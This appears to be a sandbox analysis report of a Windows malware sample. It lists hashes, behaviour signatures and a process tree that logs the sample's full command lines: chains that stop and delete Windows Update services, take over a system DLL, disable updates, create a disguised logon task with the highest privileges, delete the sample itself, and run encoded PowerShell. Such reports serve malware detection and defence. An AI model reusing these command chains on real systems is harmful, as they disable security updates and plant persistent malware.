Analysis

  • max time kernel
    300s
  • max time network
    299s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    25-08-2022 22:15

General

  • Target

    06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe

  • Size

    4.3MB

  • MD5

    4f0dcfb8b8cf69bb60c7c051554f0fc5

  • SHA1

    992f2bf6e63b6894c6f5311efa2cf908e50621d1

  • SHA256

    06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130

  • SHA512

    936a221740b37898a24606732b2aab688c332ce35fc6f5c7a1ca166f024bd9cd9c7e332b19e01e3ad26ca4d50b2bc45e512e315a2b0dfa3c14301ecc4aeeb83c

  • SSDEEP

    98304:L56u2b1q7yXmonPI9d80h0zlLKc7ol9qSrQDrmPTj1CWDcWt4RdKFnb71:16N1+ImonA9d80hSKNmS8Drmn9dSCFnt

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe
    "C:\Users\Admin\AppData\Local\Temp\06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AegBpAGYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB6AGcAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAcgBzAGEAIwA+ACAAQAAoACAAPAAjAHQAZwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAbAB0AHIAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdgBhAG0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZwB0AHcAcQAjAD4A"
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1740
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1268
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:300
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:852
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:584
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:276
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:672
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:1552
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:1280
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:1252
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:880
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:824
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1684
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1636
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1688
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1564
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1748
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1300
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        3⤵
          PID:1692
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          3⤵
            PID:1468
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            3⤵
              PID:1924
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              3⤵
                PID:752
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                3⤵
                  PID:852
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  3⤵
                    PID:316
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    3⤵
                      PID:1548
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1632
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1916
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -hibernate-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1756
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1772
                    • C:\Windows\system32\powercfg.exe
                      powercfg /x -standby-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1224
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "TaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\onedrive\updater.exe\""
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1944
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "TaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\onedrive\updater.exe\""
                      3⤵
                      • Creates scheduled task(s)
                      PID:568
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "TaskMachineQC"
                    2⤵
                      PID:552
                      • C:\Windows\system32\schtasks.exe
                        schtasks /run /tn "TaskMachineQC"
                        3⤵
                          PID:936
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130.exe"
                        2⤵
                        • Deletes itself
                        PID:960
                        • C:\Windows\system32\choice.exe
                          choice /C Y /N /D Y /T 3
                          3⤵
                            PID:1580
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {394466D6-04AC-4F7F-A2AA-869DF92E83DA} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
                        1⤵
                        • Loads dropped DLL
                        PID:2016
                        • C:\Users\Admin\AppData\Roaming\onedrive\updater.exe
                          C:\Users\Admin\AppData\Roaming\onedrive\updater.exe
                          2⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1916
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AegBpAGYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB6AGcAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAcgBzAGEAIwA+ACAAQAAoACAAPAAjAHQAZwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAbAB0AHIAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdgBhAG0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZwB0AHcAcQAjAD4A"
                            3⤵
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1224
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            3⤵
                              PID:1504
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                4⤵
                                • Launches sc.exe
                                PID:1776
                              • C:\Windows\system32\sc.exe
                                sc stop WaaSMedicSvc
                                4⤵
                                • Launches sc.exe
                                PID:1868
                              • C:\Windows\system32\sc.exe
                                sc stop wuauserv
                                4⤵
                                • Launches sc.exe
                                PID:884
                              • C:\Windows\system32\sc.exe
                                sc stop bits
                                4⤵
                                • Launches sc.exe
                                PID:800
                              • C:\Windows\system32\sc.exe
                                sc stop dosvc
                                4⤵
                                • Launches sc.exe
                                PID:1608
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                4⤵
                                • Modifies registry key
                                PID:968
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                4⤵
                                • Modifies registry key
                                PID:1700
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                4⤵
                                • Modifies registry key
                                PID:1688
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                4⤵
                                • Modifies registry key
                                PID:1536
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                4⤵
                                • Modifies registry key
                                PID:604
                              • C:\Windows\system32\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1488
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:764
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:980
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:752
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:1144
                              • C:\Windows\system32\reg.exe
                                reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                4⤵
                                • Modifies registry key
                                PID:292
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                4⤵
                                  PID:788
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                  4⤵
                                    PID:1760
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                    4⤵
                                      PID:468
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                      4⤵
                                        PID:672
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                        4⤵
                                          PID:1736
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                          4⤵
                                            PID:748
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                            4⤵
                                              PID:636
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            3⤵
                                              PID:1560
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-ac 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1336
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -hibernate-timeout-dc 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:936
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-ac 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:940
                                              • C:\Windows\system32\powercfg.exe
                                                powercfg /x -standby-timeout-dc 0
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1492
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "TaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\onedrive\updater.exe\""
                                              3⤵
                                                PID:1964
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /create /f /sc onlogon /rl highest /tn "TaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\onedrive\updater.exe\""
                                                  4⤵
                                                  • Creates scheduled task(s)
                                                  PID:1584
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe "yzwyhvirgqrdsr"
                                                3⤵
                                                  PID:1776
                                                • C:\Windows\System32\conhost.exe
                                                  C:\Windows\System32\conhost.exe nqsldvclynffpxop1 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUMMwdye4IvPsuXt2o7Ue89PqrzXJJS78Bbiw0VejdiRjZslZyebWyV9TcMZ+rcL3aHt8j1oQEYydoYAE02Lc8j+XSnyzxnVfEdaOaz6bIp+CfofeRtsCzUuXLOljjvVk8AWXsBLZ7I6G15wzT1KAGhVAqZPUMUx2qsIhsH0T3Rf6OV3SJGMIMrUSwlzp4YmT5IlJumoipZCNFQC1LXEoNt1hFAeAA9nqpmVqkb1V9vDm2a9UstZjO4QeJSnwK3rFBPsAcXPb8sKlc4YD/QYG+3N2IJCnSMA5rdxO8jOHPo2Zso9+8vrCBwY230RZ5G5vg913YU6rX0cwJu4scKI4maz8uDMlPX88irqLw8n9ICqrVGzGnzADwg+ZmZY/eGW0HGSS5NcF1VIdC5aSxyaLC1wvkuaLY6fNDws2VTKUJwJhCK7PHby3oZ7bc8G1J6JQft13BLCmH56+QWaMKKZvD7Q/8R5tdHsrSw+F4Ak4dIckVhdAxY7FkoowBJIa1pVhgyU7CZAUiC1gRZzMLL/Tt2yHKqhFKlfZWFEa4ptwhHzdb27YmnpNNAADVlP4S+vb4X/ePgHBrTTRxaUZsos/ii0SogIn3UNZ9asqgAdJtVYGPN0RFycFgTw6BDXSSZrZ+Y/u+4L5LumsibL68EkkYzDaq4/+ps6qoMoJSxZ9Ar0EGn3Q801qDbHwdqDNn66W4IJdcs9J8TfCdJGR6fGurSu4lIlcUSl6wY8Ud0jUcutiSm0jnSkdc9JXRfRojUw1E7yLmlnlS8yN79gK0mBSLbC5gYJvYFnnAQe3n4uPDy0aFGJg2G2kVESbwhhjavHbxkO1Wf/oxDM7s6lrpfr3MEkcpTwjUznfQEb/fk1FeB3pb+NCf2UvIJgsDvTcDL9RNXU/WZJfsGa+CFhi9SiNVhFWWSuWKIOh6EHIziFrAjmfbGPpbvH2a7j82GhEkRccpbtDWr5Hv0ANyHp1G4y1z9s/Pd/1pj0YgV2wTDbZLy9j6JaUvSG7VJuKoPSKJeiDzLBc0A2x9gUJDwwLLAZvu7kU0FLfD19QUwnYyyDWY+RmCqx6Gfts4QK1iU+wdOFDLR5ea55iIdV9HRNtwysBmmGXOxx1hJ6KRMJEVVP5XOd5U6U5oY6tNl4O4hD9EOrAT0JsHxdhHqI+LbLQZ6w2dS20QLh3T8vptaXWGb/GO0bhvmtXMfstV2+L84dk6oyyv5bzIGPJCS8gkP1+PZqUC9pYdH645GwYESpzCrKcTB0u5wGSVq+rp0usWUjpIICBV8PCFcId1Z4a0gu0j6v95j1ONlz94wVsEnIMrJEi2EYvFzRgN1fGAl4kV+iOGEkgWZKP4Z9mWBkSUVmbC96/D7fgK4xTDgTrKzXN2a+4vD3x/wy5xdEznFr907cftXUCckGDWgztb26AaRqZK1Ib11sAfjx9KCq8OqMiiNafFhbzZX4IRqIi1MtUW9ZXLHodTzZLPxyX5QnbmrUlbrZl2O7yKgLQp/gp56CrMhXunJCdFanGvD2UK5hdeltt+Y+VVr2NXQ1Uno76Aa1uOn1MqzZzi22DXhHe73I50tDrnD4mE/TJXnuUzvp7al7otFBPLjqQPsjWSwh2zsWpSOjK7DJbdpfx/6EmEYAUy36sEIwA4Eat2NcvbyYUszSXynWyC8sxrh6BfEjClfhlwQS6ypGpdBG65Kyg9V+Iz0GHxsR33THQcLjek3QfukuYYC4UjGmvGML3nPTWDo2Sz9uzWnMuSkUpGgZ0Ceg0EV3U36ln3WIQElbO5iRZ+VtCT0cp3xSs/bqMTHf9t35B1749DGSOLjroKTayw99TBApcZBykl9ax4Ctwb9EayrDtv4TQEpYf/bceVPwCv5PHmzbhabIV/GQfyATX4Is7Udgam2wGy/Y8MSi24NGUqxOiWGAHFbiAtCWnY3IW5rDYhkFh5ybMDm9TqD5Ophq66pA8BFrIjX6rSLnAZDo92W9ETvfjpVjXS2DSFGqKzlqRMf6EiIv3x9vO20hZ30OCKa2OH4WtyG5kRIb80lsoGM6T6RjGmwvAYvbVJcYz3tQ6U0f4eh2FGqzjR48D2vqhRh69SpuA4pd7dKMXW6NIJNWCOsdbifsk8AfQv/zPF4YEmXkZlnG52QqwkmUc2ALJsUhBQznwYfVW6H22A6nELCX76P6+CHbj2p9I60y1tfgawHcZTzIs7HDriO1XVrcUqKqHvAKJ7LER4BhjnkPZsdjMRzSIRiYfbv8u45OsDw4CtnF8pqq+kS7vNt0bfIUCiIo0gjDTtNoDJ7NAxDHKV5ZnAInSMNFI6EHCm09ao0kH9Z5Gmovg1vC99b9TfeZM8GlfG3vXoqF0Qtjli2un25BP0i3NwpX75X5nNthHiSCiPnAzLiotnvzLBt4G6O0bptc6vQ+KsDCF9sSNffOsa9H8wsoNyTUMyTA4CJF4NgH4LsNJYQV4+Ie7iQQwEyzPuURKU6uNFjoK4nEdeMaIEDqgxvQBQff94XYusbzuqvp+8GnCuWVkq2ftUJTVOA5imeiHStGb+vLlN2oIKH8R4hsirhLOQV4QCvDff7Ap7P4EuQqS/EXBmc2AOPGaZd3x1FdALfF3nHDrXe4Tsv+MNwOuzLumJx61qgGBgfU6Qu+jV/GP+ujQDjzpFrp4pJaA9cewEta5iVrgfiZHb658fssWAjqZWdRgByGzdMPKGzMoXAFqFSDEVrELy32VpykhE4fdm1hWCBZ3tXuseZfROlvCcXhGILvDcUDWgnhG/5Eo5Nfl9XVcLA7uZChbQ5X6tncKsOKBDr9fnJkteJyWx+nikK3tfyVWLiJDbUfCBn8aQ5Lg87xDoujqa3VecKmLUJvQqkUOX+9XWGdOCJlOLllCIxqZQfGMgTBVSZW45dosoktVDCv7/y337s+6+PAfd6r8hH+n4LudOrpXc2VUowRTiUE/Yg/TXX/gROuaYZLhzZY+SsSQM9PBrIf1VkCQ5m7PfLz71FWU0H46NBv4JFeFsOj/b
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:944

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                              Filesize

                                              7KB

                                              MD5

                                              38ced0c1e0ab1e75bbf803ba204443a5

                                              SHA1

                                              43c087377b81d8aff5075f3891453acbdb0193da

                                              SHA256

                                              2ee5cabaf23d23eee5f9f227abe51b349fe3caf6187a44f5471c053a7c2dfc55

                                              SHA512

                                              2fd24e47a16b411758b97aca2002b9d1e571bef010f5b38c0d14cc024a629d29e96e9e8de1e598a3a01305ec4f8d776cdedf66c74de708bd0d12166ee76503f7

                                            • C:\Users\Admin\AppData\Roaming\onedrive\updater.exe

                                              Filesize

                                              4.3MB

                                              MD5

                                              4f0dcfb8b8cf69bb60c7c051554f0fc5

                                              SHA1

                                              992f2bf6e63b6894c6f5311efa2cf908e50621d1

                                              SHA256

                                              06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130

                                              SHA512

                                              936a221740b37898a24606732b2aab688c332ce35fc6f5c7a1ca166f024bd9cd9c7e332b19e01e3ad26ca4d50b2bc45e512e315a2b0dfa3c14301ecc4aeeb83c

                                            • C:\Users\Admin\AppData\Roaming\onedrive\updater.exe

                                              Filesize

                                              4.3MB

                                              MD5

                                              4f0dcfb8b8cf69bb60c7c051554f0fc5

                                              SHA1

                                              992f2bf6e63b6894c6f5311efa2cf908e50621d1

                                              SHA256

                                              06b719ce32121712829a8c2f21a77893f1e435e6b1cbfc0fc857d8bb37761130

                                              SHA512

                                              936a221740b37898a24606732b2aab688c332ce35fc6f5c7a1ca166f024bd9cd9c7e332b19e01e3ad26ca4d50b2bc45e512e315a2b0dfa3c14301ecc4aeeb83c

                                            • C:\Windows\system32\drivers\etc\hosts

                                              Filesize

                                              4KB

                                              MD5

                                              1f555cac34c1df424f6f21fed8a628bc

                                              SHA1

                                              dfcdccfbed91737145620e2e16ac260c530aa007

                                              SHA256

                                              3245c007a797d0cb887caa71ce6a05252581902536a5ee4189a4be141a26f8f8

                                              SHA512

                                              8c85eb8b7f9b528f81aa60690accbfef5a354422c6bb8a446b0b227a63f7f625d670e6c2e45ff47d8913c382ba9f3d71faf9860af1adaf10e7c5eec99326f351

                                            • \Users\Admin\AppData\Roaming\D431.tmp

                                              MD5

                                              d41d8cd98f00b204e9800998ecf8427e

                                              SHA1

                                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                                              SHA256

                                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                              SHA512

